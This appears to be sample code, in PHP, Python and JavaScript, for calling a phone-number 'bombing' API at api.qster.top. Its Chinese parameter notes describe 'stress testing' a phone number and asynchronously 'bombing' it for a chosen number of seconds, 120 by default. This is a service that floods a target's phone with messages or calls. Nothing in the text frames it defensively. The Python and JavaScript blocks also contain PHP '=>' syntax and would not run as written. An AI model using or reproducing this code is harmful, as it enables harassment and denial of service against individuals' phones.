<?php
// 要调用的 URL
$url = "https://api.qster.top/API/v1/phone";
// 参数数组
$params = [
"phone" => "手机号码,目前不提供密钥使用",
"type" => "html/json/yb 默认html,html时网页测压,json返回链接,yb为异步请求,先将手机号请求到服务器,然后等待服务器完成进程",
"time" => "异步时选择,异步轰炸多少秒 默认120秒",
"qskey" => "0",
];
// 使用 http_build_query 将参数转换为查询字符串
$queryString = http_build_query($params);
// 在 URL 中添加查询字符串
$finalUrl = $url . '?' . $queryString;
// 使用 file_get_contents 获取内容
$response = file_get_contents($finalUrl);
// 输出响应
echo $response;
?>
import requests
url = "https://api.qster.top/API/v1/phone";
params = {
"phone" : "手机号码,目前不提供密钥使用",
"type" : "html/json/yb 默认html,html时网页测压,json返回链接,yb为异步请求,先将手机号请求到服务器,然后等待服务器完成进程",
"time" : "异步时选择,异步轰炸多少秒 默认120秒",
"qskey" => "0"
}
response = requests.get(url, params=params)
print(response.text)
function fetchData(url, params) {
const queryString = Object.keys(params)
.map(key => `${encodeURIComponent(key)}=${encodeURIComponent(params[key])}`)
.join('&');
const fullUrl = `${url}?${queryString}`;
fetch(fullUrl)
.then(response => response.text())
.then(data => {
const resultElement = document.createElement('pre');
resultElement.textContent = data;
document.body.appendChild(resultElement);
})
.catch(error => console.error('Error fetching data:', error));
}
// 示例用法
const url = "https://api.qster.top/API/v1/phone";
const params = {
"phone" : "手机号码,目前不提供密钥使用",
"type" : "html/json/yb 默认html,html时网页测压,json返回链接,yb为异步请求,先将手机号请求到服务器,然后等待服务器完成进程",
"time" : "异步时选择,异步轰炸多少秒 默认120秒",
"qskey" => "0"
};
fetchData(url, params);